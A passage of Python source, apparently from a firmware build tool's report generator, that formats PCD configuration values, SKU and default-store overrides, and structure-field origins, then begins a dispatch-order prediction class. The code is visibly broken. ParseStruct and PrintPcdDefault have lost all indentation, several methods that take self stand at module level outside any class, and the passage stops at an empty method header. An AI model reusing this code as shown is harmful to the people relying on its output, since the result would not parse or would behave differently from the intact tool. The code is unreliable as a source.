                        DscMatch = (DscDefaultValueNumber == PcdValueNumber)
                else:
                    if DecDefaultValue is None:
                        DecMatch = True
                    else:
                        DecMatch = (DecDefaultValue.strip() == PcdValue.strip())
                    if InfDefaultValue is None:
                        InfMatch = True
                    else:
                        InfMatch = (InfDefaultValue.strip() == PcdValue.strip())
                    if DscDefaultValue is None:
                        DscMatch = True
                    else:
                        DscMatch = (DscDefaultValue.strip() == PcdValue.strip())
                IsStructure = False
                if self.IsStructurePcd(Pcd.TokenCName, Pcd.TokenSpaceGuidCName):
                    # Structure PCDs are replaced by their richer gStructurePcd
                    # object and the match flags recomputed from its field origins.
                    IsStructure = True
                    if TypeName in ('DYNVPD', 'DEXVPD'):
                        SkuInfoList = Pcd.SkuInfoList
                    Pcd = GlobalData.gStructurePcd[self.Arch][(Pcd.TokenCName, Pcd.TokenSpaceGuidCName)]
                    if ModulePcdSet and ModulePcdSet.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type)):
                        InfDefaultValue, PcdComponentValue = ModulePcdSet[Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Type]
                        DscDefaultValBak = Pcd.DefaultValue
                        Pcd.DefaultValue = PcdComponentValue
                    Pcd.DatumType = Pcd.StructName
                    if TypeName in ('DYNVPD', 'DEXVPD'):
                        # Restore the SKU info the substituted object lacks.
                        Pcd.SkuInfoList = SkuInfoList
                    if Pcd.PcdValueFromComm or Pcd.PcdFieldValueFromComm:
                        BuildOptionMatch = True
                        DecMatch = False
                    elif Pcd.PcdValueFromFdf or Pcd.PcdFieldValueFromFdf:
                        DscDefaultValue = True
                        DscMatch = True
                        DecMatch = False
                    else:
                        if Pcd.Type in PCD_DYNAMIC_TYPE_SET | PCD_DYNAMIC_EX_TYPE_SET:
                            DscOverride = False
                            if Pcd.DefaultFromDSC:
                                DscOverride = True
                            else:
                                # Scan SKU/default-store field overrides for any
                                # value that originated from the DSC file.
                                DictLen = 0
                                for item in Pcd.SkuOverrideValues:
                                    DictLen += len(Pcd.SkuOverrideValues[item])
                                if not DictLen:
                                    DscOverride = False
                                else:
                                    if not Pcd.SkuInfoList:
                                        OverrideValues = Pcd.SkuOverrideValues
                                        if OverrideValues:
                                            for Data in OverrideValues.values():
                                                Struct = list(Data.values())
                                                if Struct:
                                                    DscOverride = self.ParseStruct(Struct[0])
                                                    break
                                    else:
                                        SkuList = sorted(Pcd.SkuInfoList.keys())
                                        for Sku in SkuList:
                                            SkuInfo = Pcd.SkuInfoList[Sku]
                                            if SkuInfo.DefaultStoreDict:
                                                DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
                                                for DefaultStore in DefaultStoreList:
                                                    OverrideValues = Pcd.SkuOverrideValues.get(Sku)
                                                    if OverrideValues:
                                                        DscOverride = self.ParseStruct(OverrideValues[DefaultStore])
                                                        if DscOverride:
                                                            break
                                            if DscOverride:
                                                break
                            if DscOverride:
                                DscDefaultValue = True
                                DscMatch = True
                                DecMatch = False
                            else:
                                DecMatch = True
                        else:
                            if Pcd.DscRawValue or (ModuleGuid and ModuleGuid.replace("-","S") in Pcd.PcdValueFromComponents):
                                DscDefaultValue = True
                                DscMatch = True
                                DecMatch = False
                            else:
                                DscDefaultValue = False
                                DecMatch = True
                #
                # Report PCD item according to their override relationship
                #
                if Pcd.DatumType == 'BOOLEAN':
                    # Normalize TRUE/1/0x1 style booleans to "1"/"0".
                    if DscDefaultValue:
                        DscDefaultValue = str(int(DscDefaultValue, 0))
                    if DecDefaultValue:
                        DecDefaultValue = str(int(DecDefaultValue, 0))
                    if InfDefaultValue:
                        InfDefaultValue = str(int(InfDefaultValue, 0))
                    if Pcd.DefaultValue:
                        Pcd.DefaultValue = str(int(Pcd.DefaultValue, 0))
                # Flag precedence: DEC (no flag) > *M (INF) > *B (build option)
                # > *M (component value) / *F (FDF) / *P (DSC).
                if DecMatch:
                    self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, ' ')
                elif InfDefaultValue and InfMatch:
                    self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*M')
                elif BuildOptionMatch:
                    self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*B')
                else:
                    if PcdComponentValue:
                        self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, PcdComponentValue, DecMatch, DecDefaultValue, '*M', ModuleGuid)
                    elif DscDefaultValue and DscMatch:
                        if (Pcd.TokenCName, Key, Field) in self.FdfPcdSet:
                            self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*F')
                        else:
                            self.PrintPcdValue(File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValBak, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, '*P')
                if ModulePcdSet is None:
                    # Platform report: additionally list per-module overrides of
                    # PATCH/FLAG/FIXED PCDs that differ from the platform value.
                    if IsStructure:
                        continue
                    if not TypeName in ('PATCH', 'FLAG', 'FIXED'):
                        continue
                    if not BuildOptionMatch:
                        ModuleOverride = self.ModulePcdOverride.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), {})
                        for ModulePath in ModuleOverride:
                            ModuleDefault = ModuleOverride[ModulePath]
                            if Pcd.DatumType in TAB_PCD_NUMERIC_TYPES:
                                if ModuleDefault.startswith('0') and not ModuleDefault.lower().startswith('0x') and \
                                        len(ModuleDefault) > 1 and ModuleDefault.lstrip('0'):
                                    ModuleDefault = ModuleDefault.lstrip('0')
                                ModulePcdDefaultValueNumber = int(ModuleDefault.strip(), 0)
                                Match = (ModulePcdDefaultValueNumber == PcdValueNumber)
                                if Pcd.DatumType == 'BOOLEAN':
                                    ModuleDefault = str(ModulePcdDefaultValueNumber)
                            else:
                                Match = (ModuleDefault.strip() == PcdValue.strip())
                            if Match:
                                continue
                            IsByteArray, ArrayList = ByteArrayForamt(ModuleDefault.strip())
                            if IsByteArray:
                                FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, '{'))
                                for Array in ArrayList:
                                    FileWrite(File, Array)
                            else:
                                Value = ModuleDefault.strip()
                                if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                                    if Value.startswith(('0x', '0X')):
                                        Value = '{} ({:d})'.format(Value, int(Value, 0))
                                    else:
                                        Value = "0x{:X} ({})".format(int(Value, 0), Value)
                                FileWrite(File, ' *M %-*s = %s' % (self.MaxLen + 15, ModulePath, Value))
        if ModulePcdSet is None:
            FileWrite(File, gSectionEnd)
        else:
            if not ReportSubType and ModulePcdSet:
                FileWrite(File, gSubSectionEnd)
def ParseStruct(self, struct):
HasDscOverride = False
if struct:
for _, Values in list(struct.items()):
for Key, value in Values.items():
if value[1] and value[1].endswith('.dsc'):
HasDscOverride = True
break
if HasDscOverride == True:
break
return HasDscOverride
def PrintPcdDefault(self, File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue):
if not DscMatch and DscDefaultValue is not None:
Value = DscDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DSC DEFAULT', Value))
if not InfMatch and InfDefaultValue is not None:
Value = InfDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'INF DEFAULT', Value))
if not DecMatch and DecDefaultValue is not None:
Value = DecDefaultValue.strip()
IsByteArray, ArrayList = ByteArrayForamt(Value)
if IsByteArray:
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', "{"))
for Array in ArrayList:
FileWrite(File, Array)
else:
if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
if Value.startswith(('0x', '0X')):
Value = '{} ({:d})'.format(Value, int(Value, 0))
else:
Value = "0x{:X} ({})".format(int(Value, 0), Value)
FileWrite(File, ' %*s = %s' % (self.MaxLen + 19, 'DEC DEFAULT', Value))
if IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
if DecMatch and IsStructure:
for filedvalues in Pcd.DefaultValues.values():
self.PrintStructureInfo(File, filedvalues)
    def PrintPcdValue(self, File, Pcd, PcdTokenCName, TypeName, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue, Flag = ' ',ModuleGuid=None):
        """Print one PCD entry (value line, structure fields, differing defaults).

        Layout depends on whether the PCD has SKU info: a plain PCD prints a
        single value line; an HII PCD prints one line per SKU/default-store
        plus its variable GUID/name/offset; a VPD PCD additionally records its
        VPD offset.  Structure PCDs also list their field-level overrides.

        @param Flag  Two-character origin marker (' ', '*M', '*B', '*F', '*P')
                     printed before the token name on the first line.
        """
        if not Pcd.SkuInfoList:
            # Simple (non-SKU) PCD: one value line.
            Value = Pcd.DefaultValue
            IsByteArray, ArrayList = ByteArrayForamt(Value)
            if IsByteArray:
                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
                for Array in ArrayList:
                    FileWrite(File, Array)
            else:
                if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                    # Strip leading zeros so int(x, 0) accepts the value, then
                    # render both hex and decimal forms.
                    if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
                        Value = Value.lstrip('0')
                    if Value.startswith(('0x', '0X')):
                        Value = '{} ({:d})'.format(Value, int(Value, 0))
                    else:
                        Value = "0x{:X} ({})".format(int(Value, 0), Value)
                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
            if IsStructure:
                # List field-level overrides of the structure PCD.
                FiledOverrideFlag = False
                if (Pcd.TokenCName,Pcd.TokenSpaceGuidCName) in GlobalData.gPcdSkuOverrides:
                    OverrideValues = GlobalData.gPcdSkuOverrides[(Pcd.TokenCName,Pcd.TokenSpaceGuidCName)]
                else:
                    OverrideValues = Pcd.SkuOverrideValues
                FieldOverrideValues = None
                if OverrideValues:
                    for Data in OverrideValues.values():
                        Struct = list(Data.values())
                        if Struct:
                            FieldOverrideValues = Struct[0]
                            FiledOverrideFlag = True
                            break
                # Component-scoped (<Pcds*> in a DSC component) field overrides
                # win; keys use ModuleGuid with '-' replaced by 'S'.
                if Pcd.PcdFiledValueFromDscComponent and ModuleGuid and ModuleGuid.replace("-","S") in Pcd.PcdFiledValueFromDscComponent:
                    FieldOverrideValues = Pcd.PcdFiledValueFromDscComponent[ModuleGuid.replace("-","S")]
                if FieldOverrideValues:
                    OverrideFieldStruct = self.OverrideFieldValue(Pcd, FieldOverrideValues)
                    self.PrintStructureInfo(File, OverrideFieldStruct)
                if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
                    OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
                    self.PrintStructureInfo(File, OverrideFieldStruct)
            self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
        else:
            # SKU-aware PCD: one value line per SKU (and per default store for
            # HII PCDs).  Only the very first line carries the flag and name.
            FirstPrint = True
            SkuList = sorted(Pcd.SkuInfoList.keys())
            for Sku in SkuList:
                SkuInfo = Pcd.SkuInfoList[Sku]
                SkuIdName = SkuInfo.SkuIdName
                if TypeName in ('DYNHII', 'DEXHII'):
                    # HII PCD: iterate default stores within the SKU.
                    if SkuInfo.DefaultStoreDict:
                        DefaultStoreList = sorted(SkuInfo.DefaultStoreDict.keys())
                        for DefaultStore in DefaultStoreList:
                            Value = SkuInfo.DefaultStoreDict[DefaultStore]
                            IsByteArray, ArrayList = ByteArrayForamt(Value)
                            if Pcd.DatumType == 'BOOLEAN':
                                Value = str(int(Value, 0))
                            if FirstPrint:
                                FirstPrint = False
                                if IsByteArray:
                                    if self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '{'))
                                    elif self.DefaultStoreSingle and not self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
                                    elif not self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
                                    else:
                                        FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
                                    for Array in ArrayList:
                                        FileWrite(File, Array)
                                else:
                                    if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                                        if Value.startswith(('0x', '0X')):
                                            Value = '{} ({:d})'.format(Value, int(Value, 0))
                                        else:
                                            Value = "0x{:X} ({})".format(int(Value, 0), Value)
                                    if self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
                                    elif self.DefaultStoreSingle and not self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
                                    elif not self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
                                    else:
                                        FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
                            else:
                                # Continuation lines: blank name column.
                                if IsByteArray:
                                    if self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '{'))
                                    elif self.DefaultStoreSingle and not self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '{'))
                                    elif not self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', '{'))
                                    else:
                                        FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', '{'))
                                    for Array in ArrayList:
                                        FileWrite(File, Array)
                                else:
                                    if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                                        if Value.startswith(('0x', '0X')):
                                            Value = '{} ({:d})'.format(Value, int(Value, 0))
                                        else:
                                            Value = "0x{:X} ({})".format(int(Value, 0), Value)
                                    if self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
                                    elif self.DefaultStoreSingle and not self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
                                    elif not self.DefaultStoreSingle and self.SkuSingle:
                                        FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + DefaultStore + ')', Value))
                                    else:
                                        FileWrite(File, ' %-*s : %6s %10s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', '(' + DefaultStore + ')', Value))
                            # HII backing variable: GUID, name and offset.
                            FileWrite(File, '%*s: %s: %s' % (self.MaxLen + 4, SkuInfo.VariableGuid, SkuInfo.VariableName, SkuInfo.VariableOffset))
                            if IsStructure:
                                OverrideValues = Pcd.SkuOverrideValues.get(Sku)
                                if OverrideValues:
                                    OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[DefaultStore])
                                    self.PrintStructureInfo(File, OverrideFieldStruct)
                            self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
                else:
                    # Non-HII SKU PCD (default or VPD).
                    Value = SkuInfo.DefaultValue
                    IsByteArray, ArrayList = ByteArrayForamt(Value)
                    if Pcd.DatumType == 'BOOLEAN':
                        Value = str(int(Value, 0))
                    if FirstPrint:
                        FirstPrint = False
                        if IsByteArray:
                            if self.SkuSingle:
                                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', "{"))
                            else:
                                FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
                            for Array in ArrayList:
                                FileWrite(File, Array)
                        else:
                            if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                                if Value.startswith(('0x', '0X')):
                                    Value = '{} ({:d})'.format(Value, int(Value, 0))
                                else:
                                    Value = "0x{:X} ({})".format(int(Value, 0), Value)
                            if self.SkuSingle:
                                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', Value))
                            else:
                                FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, Flag + ' ' + PcdTokenCName, TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
                    else:
                        if IsByteArray:
                            if self.SkuSingle:
                                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', "{"))
                            else:
                                FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', "{"))
                            for Array in ArrayList:
                                FileWrite(File, Array)
                        else:
                            if Pcd.DatumType in TAB_PCD_CLEAN_NUMERIC_TYPES:
                                if Value.startswith(('0x', '0X')):
                                    Value = '{} ({:d})'.format(Value, int(Value, 0))
                                else:
                                    Value = "0x{:X} ({})".format(int(Value, 0), Value)
                            if self.SkuSingle:
                                FileWrite(File, ' %-*s : %6s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', Value))
                            else:
                                FileWrite(File, ' %-*s : %6s %10s %10s = %s' % (self.MaxLen, ' ', TypeName, '(' + Pcd.DatumType + ')', '(' + SkuIdName + ')', Value))
                    if TypeName in ('DYNVPD', 'DEXVPD'):
                        FileWrite(File, '%*s' % (self.MaxLen + 4, SkuInfo.VpdOffset))
                        # Record VPD info in the module-level VPDPcdList
                        # (presumably a module global — confirm) unless the PCD
                        # is already listed as used.
                        VPDPcdItem = (Pcd.TokenSpaceGuidCName + '.' + PcdTokenCName, SkuIdName, SkuInfo.VpdOffset, Pcd.MaxDatumSize, SkuInfo.DefaultValue)
                        if VPDPcdItem not in VPDPcdList:
                            PcdGuidList = self.UnusedPcds.get(Pcd.TokenSpaceGuidCName)
                            if PcdGuidList:
                                PcdList = PcdGuidList.get(Pcd.Type)
                                if not PcdList:
                                    VPDPcdList.append(VPDPcdItem)
                                # for/else: append only when no unused PCD with
                                # the same token name is found.
                                for VpdPcd in PcdList:
                                    if PcdTokenCName == VpdPcd.TokenCName:
                                        break
                                else:
                                    VPDPcdList.append(VPDPcdItem)
                    if IsStructure:
                        FiledOverrideFlag = False
                        OverrideValues = Pcd.SkuOverrideValues.get(Sku)
                        if OverrideValues:
                            Keys = list(OverrideValues.keys())
                            OverrideFieldStruct = self.OverrideFieldValue(Pcd, OverrideValues[Keys[0]])
                            self.PrintStructureInfo(File, OverrideFieldStruct)
                            FiledOverrideFlag = True
                        if not FiledOverrideFlag and (Pcd.PcdFieldValueFromComm or Pcd.PcdFieldValueFromFdf):
                            OverrideFieldStruct = self.OverrideFieldValue(Pcd, {})
                            self.PrintStructureInfo(File, OverrideFieldStruct)
                    self.PrintPcdDefault(File, Pcd, IsStructure, DscMatch, DscDefaultValue, InfMatch, InfDefaultValue, DecMatch, DecDefaultValue)
def OverrideFieldValue(self, Pcd, OverrideStruct):
    """Merge per-field structure-PCD overrides from DSC, FDF and command line.

    Fields recorded in *OverrideStruct* whose origin file ends in '.dsc' are
    taken first; values from the FDF file and from the build command line are
    then layered on top, except where they merely repeat the value already
    recorded for the same field.  Returns an OrderedDict preserving the order
    in which overrides were discovered.
    """
    merged = collections.OrderedDict()
    if OverrideStruct:
        for field_values in OverrideStruct.values():
            for field, info in field_values.items():
                origin = info[1]
                if origin and origin.endswith('.dsc'):
                    merged[field] = info
    # Layer FDF-file and then command-line overrides on top of the DSC ones;
    # identical values for an already-recorded field are left untouched.
    for extra in (Pcd.PcdFieldValueFromFdf, Pcd.PcdFieldValueFromComm):
        if not extra:
            continue
        for field, info in extra.items():
            if field in merged and info[0] == merged[field][0]:
                continue
            merged[field] = info
    return merged
def PrintStructureInfo(self, File, Struct):
    """Write one report line per structure-PCD field, flagging its override origin.

    Fields overridden from the build command line are marked *B; fields
    overridden in the FDF file are marked *F; all other fields are unmarked.
    Output is sorted by field name for a stable report.
    """
    for FieldName, FieldInfo in sorted(Struct.items(), key=lambda item: item[0]):
        Origin = FieldInfo[1]
        if Origin and 'build command options' in Origin:
            FileWrite(File, ' *B %-*s = %s' % (self.MaxLen + 4, '.' + FieldName, FieldInfo[0]))
        elif Origin and Origin.endswith('.fdf'):
            FileWrite(File, ' *F %-*s = %s' % (self.MaxLen + 4, '.' + FieldName, FieldInfo[0]))
        else:
            FileWrite(File, ' %-*s = %s' % (self.MaxLen + 4, '.' + FieldName, FieldInfo[0]))
def StrtoHex(self, value):
    """Convert a PCD value string to its hexadecimal representation.

    - A plain integer string becomes a hex string ('16' -> '0x10').
    - L"..." wide strings become a list of per-character hex code points
      followed by a '0x00' terminator.
    - "c" single-character strings become the character's hex code.
    - {a, b, ...} byte arrays become a list of hex byte strings; a
      single-member array returns the bare member text.
    - Anything unrecognized is returned unchanged.
    """
    try:
        # Plain decimal (or already-int) value.
        return hex(int(value))
    except (TypeError, ValueError):
        # Not a simple integer; fall through to the string forms below.
        # (Narrowed from a bare except so SystemExit/KeyboardInterrupt
        # are no longer swallowed.)
        pass
    if value.startswith("L\"") and value.endswith("\""):
        # Wide string: one hex code point per character plus NUL terminator.
        valuelist = [hex(ord(ch)) for ch in value[2:-1]]
        valuelist.append('0x00')
        return valuelist
    elif value.startswith("\"") and value.endswith("\""):
        # Single ASCII character in quotes.
        return hex(ord(value[1:-1]))
    elif value.startswith("{") and value.endswith("}"):
        if ',' not in value:
            # Single-member array: return the member text as-is.
            return value[1:-1]
        valuelist = []
        for ch in value[1:-1].split(','):
            ch = ch.strip()
            if ch.startswith(('0x', '0X')):
                valuelist.append(ch)
                continue
            try:
                valuelist.append(hex(int(ch)))
            except ValueError:
                # Skip malformed array members (matches prior behavior).
                pass
        return valuelist
    else:
        return value
def IsStructurePcd(self, PcdToken, PcdTokenSpaceGuid):
    """Return True if (PcdToken, PcdTokenSpaceGuid) is registered as a
    structure PCD for this report's architecture in the global database."""
    StructPcds = GlobalData.gStructurePcd
    # bool() guards against gStructurePcd being None/empty; short-circuit
    # evaluation preserves the original membership-test order.
    return bool(StructPcds and self.Arch in StructPcds
                and (PcdToken, PcdTokenSpaceGuid) in StructPcds[self.Arch])
##
# Reports platform and module Prediction information
#
# This class reports the platform execution order prediction section and
# module load fixed address prediction subsection in the build report file.
#
class PredictionReport(object):
    ##
    # Constructor function for class PredictionReport
    #
    # This constructor function generates PredictionReport object for the platform.
    # It walks all module/library AutoGen objects to collect .c sources, their
    # includes, and the GUID C-name -> registry-format-GUID map that the EOT
    # tool consumes, then collects the platform FV list (including nested FVs).
    #
    # @param self: The object pointer
    # @param Wa Workspace context information
    #
    def __init__(self, Wa):
        self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
        self._MapFileParsed = False
        self._EotToolInvoked = False
        self._FvDir = Wa.FvDir
        self._EotDir = Wa.BuildDir
        self._FfsEntryPoint = {}   # module GUID -> (INF entry point name, real entry point name)
        self._GuidMap = {}         # GUID C name -> registry-format GUID string
        self._SourceList = []
        self.FixedMapDict = {}     # module GUID -> [(address type, address, "*I"/"*E"), ...]
        self.ItemList = []         # (phase, symbol, INF path) tuples from EOT output
        self.MaxLen = 0            # widest symbol name seen; used for report column alignment
        #
        # Collect all platform reference source files and GUID C Name
        #
        for Pa in Wa.AutoGenObjectList:
            for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
                #
                # BASE typed modules are EFI agnostic, so we need not scan
                # their source code to find PPI/Protocol produce or consume
                # information.
                #
                if Module.ModuleType == SUP_MODULE_BASE:
                    continue
                #
                # Add module referenced source files
                #
                self._SourceList.append(str(Module))
                IncludeList = {}
                for Source in Module.SourceFileList:
                    if os.path.splitext(str(Source))[1].lower() == ".c":
                        self._SourceList.append(" " + str(Source))
                        FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
                for IncludeFile in IncludeList.values():
                    self._SourceList.append(" " + IncludeFile)

                for Guid in Module.PpiList:
                    self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
                for Guid in Module.ProtocolList:
                    self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
                for Guid in Module.GuidList:
                    self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])

                if Module.Guid and not Module.IsLibrary:
                    EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
                    # The generated autogen stub is always named _ModuleEntryPoint.
                    RealEntryPoint = "_ModuleEntryPoint"
                    self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)

        #
        # Collect platform firmware volume list as the input of EOT.
        #
        self._FvList = []
        if Wa.FdfProfile:
            for Fd in Wa.FdfProfile.FdDict:
                for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
                    if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
                        continue
                    for FvName in FdRegion.RegionDataList:
                        if FvName in self._FvList:
                            continue
                        self._FvList.append(FvName)
                        for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
                            for Section in Ffs.SectionList:
                                try:
                                    # FV image sections reference nested FVs.
                                    for FvSection in Section.SectionList:
                                        if FvSection.FvName in self._FvList:
                                            continue
                                        self._FvList.append(FvSection.FvName)
                                except AttributeError:
                                    # Leaf sections have no SectionList.
                                    pass
    ##
    # Parse platform fixed address map files
    #
    # This function parses the platform final fixed address map file to get
    # the database of predicted fixed address for module image base, entry point
    # etc.
    #
    # @param self: The object pointer
    #
    def _ParseMapFile(self):
        # Idempotent: parse at most once per report instance.
        if self._MapFileParsed:
            return
        self._MapFileParsed = True
        if os.path.isfile(self._MapFileName):
            try:
                FileContents = open(self._MapFileName).read()
                for Match in gMapFileItemPattern.finditer(FileContents):
                    AddressType = Match.group(1)
                    BaseAddress = Match.group(2)
                    EntryPoint = Match.group(3)
                    Guid = Match.group(4).upper()
                    List = self.FixedMapDict.setdefault(Guid, [])
                    # "*I" = image base, "*E" = entry point (see report legend).
                    List.append((AddressType, BaseAddress, "*I"))
                    List.append((AddressType, EntryPoint, "*E"))
            except:
                # NOTE(review): bare except also hides parse/decode errors,
                # not only the I/O failure the message suggests -- confirm.
                EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
    ##
    # Invokes EOT tool to get the predicted the execution order.
    #
    # This function invokes EOT tool to calculate the predicted dispatch order
    #
    # @param self: The object pointer
    #
    def _InvokeEotTool(self):
